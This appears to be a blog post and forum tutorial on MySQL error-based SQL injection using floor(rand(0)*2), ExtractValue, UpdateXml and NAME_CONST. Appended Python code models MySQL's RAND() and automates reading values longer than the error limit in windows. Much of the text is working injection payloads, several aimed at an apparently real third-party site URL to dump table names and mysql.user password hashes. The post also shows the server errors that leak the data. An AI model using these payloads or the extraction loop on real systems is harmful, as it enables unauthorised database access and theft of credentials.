MySQL error-based injection: exploiting the floor, ExtractValue and UpdateXml error modes

Posted 2015-11-11 19:03:37

1. Triggering an error with floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
Start with a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The error message leaks the MySQL version. The trick works because rand(0) is seeded and therefore returns the same sequence every time, while MySQL evaluates the GROUP BY key expression once to look a group up and again when it inserts a new group into the grouping temporary table; the re-evaluated key collides with one already inserted and the server reports the colliding value in the Duplicate entry error. It needs at least three rows in the FROM table, which is why information_schema.tables is used as the row source (it always has enough rows) and why Method 2 below builds a three-row derived table with a union. To read other data, replace version() with the subquery you want.
For example, to read the admin user name and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue
Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'

Both XPath functions exist from MySQL 5.1.5 onward, and the error echoes at most 32 characters of the offending expression, so longer values have to be read in pieces with substr(). The 0x5c and 0x3a prefixes are used only because no XPath expression may begin with '\' or ':', which guarantees the syntax error regardless of what the subquery returns.



More collected payloads:


http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Error-based injection on newer MySQL versions: exploiting NAME_CONST
It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
Background
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|------|
| TEST |
|------|
|  1   |
|------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables
Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
VAR = Your MySQL variable.
MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
We should get a duplicate column 1 error...
Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out this bitch..
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here, if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this, and I get the duplicate column name 'Host'.
Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
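Why the floor(rand(0)*2) trick in section 1 of the post errors at all, and why it needs at least three source rows, is easiest to see by modelling it. The Python below is an added example, not code from the post or from MySQL: it ports MySQL's seeded RAND() generator (the my_rnd() linear congruential generator in mysys/my_rnd.c, seeded the way RAND(N) seeds it) and a deliberately simplified model of how GROUP BY builds its temporary table, in which the key expression is evaluated once to look a group up and again when a new group is inserted. The leaked prefix string, the row counts and that two-evaluation model are assumptions of this example.

```python
# MySQL's seeded RAND() and a model of GROUP BY key handling: why
# floor(rand(0)*2) is a reliable error oracle and why it needs >= 3 rows.
MAX_VALUE = 0x3FFFFFFF          # rand_struct.max_value in mysys/my_rnd.c


class MySQLRand:
    """Port of my_rnd_init()/my_rnd() with the seeds RAND(N) derives from N."""

    def __init__(self, seed):
        # Item_func_rand::seed_random(): seed1 = N*0x10001 + 55555555,
        # seed2 = N*0x10000001, each truncated to uint32 and reduced mod max.
        self.seed1 = ((seed * 0x10001 + 55555555) & 0xFFFFFFFF) % MAX_VALUE
        self.seed2 = ((seed * 0x10000001) & 0xFFFFFFFF) % MAX_VALUE

    def next(self):
        """One evaluation of RAND(); RAND(0) starts 0.1552..., 0.6208..., ..."""
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


def rand_sequence(seed=0, n=8):
    """Successive RAND(seed) values inside one statement."""
    rnd = MySQLRand(seed)
    return [rnd.next() for _ in range(n)]


def floor_rand_sequence(seed=0, n=8):
    """Values floor(rand(seed)*2) takes on successive evaluations in one query."""
    return [int(v * 2) for v in rand_sequence(seed, n)]


def simulate_group_by(nrows, seed=0, leaked="5.1.33-community-log"):
    """Simplified model (an assumption of this example, not MySQL source) of
    GROUP BY over a temporary table with a non-deterministic key: the key is
    evaluated once to look the group up and, if the group is new, evaluated
    again while inserting it. With rand(0) the two evaluations differ, so the
    inserted key can already exist -> ERROR 1062 carrying the key, i.e. the
    leaked data. Returns (groups, error_message_or_None)."""
    rnd = MySQLRand(seed)
    groups = {}
    for _ in range(nrows):                                  # one pass per source row
        lookup_key = leaked + str(int(rnd.next() * 2))      # concat(version(), floor(rand(0)*2))
        if lookup_key in groups:
            groups[lookup_key] += 1                         # count(*) for an existing group
            continue
        insert_key = leaked + str(int(rnd.next() * 2))      # re-evaluated on insert
        if insert_key in groups:
            return groups, (f"ERROR 1062 (23000): Duplicate entry '{insert_key}' "
                            f"for key 'group_key'")
        groups[insert_key] = 1
    return groups, None


def minimum_rows_to_error(seed=0, limit=64):
    """Smallest row count of the FROM table at which the oracle fires."""
    for n in range(1, limit + 1):
        if simulate_group_by(n, seed)[1] is not None:
            return n
    return None


if __name__ == "__main__":
    print("floor(rand(0)*2):", floor_rand_sequence())
    print("rows needed:", minimum_rows_to_error())
    print(simulate_group_by(3)[1])
```

With the sequence 0, 1, 1, 0, 1, ... the first row inserts key "...1", the second row finds it, and the third row looks up "...0", misses, re-evaluates to "...1" and collides. One or two rows never error, which is exactly why Method 2 in the post fabricates a three-row derived table with its union.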

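For sections 2 and 3 of the post (and the NAME_CONST variant collected after them), the practical work is pulling the leaked value out of the error text and getting around the 32-character limit of the XPath error. The Python below is an added example, not code from the post: leaked_value() parses the three error-message shapes shown on this page, extractvalue_payload() builds a substr()-windowed payload, and dump_value() reassembles a value longer than one window. fake_mysql() is a constructed stand-in for the injectable page that reproduces only MySQL's truncation behaviour, and SAMPLE_SECRET is the hash printed in the post reused as test data; nothing here talks to a real server.

```python
import re

# Error-message shapes of the three oracles on this page, taken from the
# post's transcripts. Group 1 is the leaked value.
ERROR_PATTERNS = [
    re.compile(r"Duplicate entry '(.*)' for key 'group_key'"),  # floor(rand(0)*2) GROUP BY
    re.compile(r"XPATH syntax error: '(.*)'"),                  # extractvalue() / updatexml()
    re.compile(r"Duplicate column name '(.*)'"),                # name_const() self-join
]


def leaked_value(error_text):
    """Return the string MySQL echoed inside the error, or None if no oracle fired."""
    for pattern in ERROR_PATTERNS:
        match = pattern.search(error_text)
        if match:
            return match.group(1)
    return None


XPATH_VISIBLE = 32                    # extractvalue()/updatexml() echo at most 32 chars
MARKER = "\\"                         # 0x5c; no XPath expression may start with it
WINDOW = XPATH_VISIBLE - len(MARKER)  # data characters that fit beside the marker


def extractvalue_payload(subquery, offset):
    """Payload leaking WINDOW characters of `subquery`'s result from 1-based `offset`."""
    return (f"and extractvalue(1, concat(0x5c, "
            f"substr(({subquery}), {offset}, {WINDOW})))")


def fake_mysql(secret, offset):
    """Constructed stand-in for the injectable page (assumption of this example):
    builds the XPath string the payload above would produce and truncates it the
    way the real error message does."""
    xpath = MARKER + secret[offset - 1:offset - 1 + WINDOW]
    return f"ERROR 1105 (HY000): XPATH syntax error: '{xpath[:XPATH_VISIBLE]}'"


def dump_value(oracle, subquery, max_len=1024):
    """Reassemble a value longer than one window by sliding substr()'s offset.
    `oracle(subquery, offset)` must return the server's error text for that payload."""
    result, offset = "", 1
    while offset <= max_len:
        leaked = leaked_value(oracle(subquery, offset))
        if leaked is None or not leaked.startswith(MARKER):
            break                      # oracle did not fire; do not loop forever
        chunk = leaked[len(MARKER):]
        result += chunk
        if len(chunk) < WINDOW:
            break                      # a short window means the value is exhausted
        offset += WINDOW
    return result


# Constructed test data: the hash shown in the post, 45 characters, so it needs
# two windows (31 + 14) to come out whole.
SAMPLE_SECRET = "root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82"


def demo():
    """Run the extraction loop against the stand-in and return the full value."""
    oracle = lambda subquery, offset: fake_mysql(SAMPLE_SECRET, offset)
    return dump_value(oracle, "select concat(user,password) from mysql.user limit 0,1")


if __name__ == "__main__":
    print(extractvalue_payload("select pass from admin limit 1", 1))
    print(demo())
```

The same windowing applies unchanged to updatexml(), which shares the 32-character limit; only the payload template differs. Stopping on a short or missing window keeps the loop from running forever when a WAF or a query error swallows the message.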